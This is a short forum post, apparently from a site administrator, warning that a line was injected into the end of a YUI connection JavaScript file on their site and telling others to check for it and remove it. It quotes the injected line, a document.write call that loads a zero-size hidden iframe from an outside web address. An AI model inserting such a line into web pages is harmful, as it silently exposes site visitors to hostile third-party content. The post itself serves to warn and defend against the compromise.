All right.. Here is the offending line of code that was causing the little box and all the spy ware to give red flags.
Code:
document.write("<iframe width='0' height='0' src='http://edu.wips.co.kr/pay/ins/sample/css/one.html '></iframe>");
This line was injected some how.
It's path in the root folder \clientscript\yui\connection\connection-min.js
It is the very last line of code. Please look to see if you have been injected with this. If so remove this line..
Thankyou.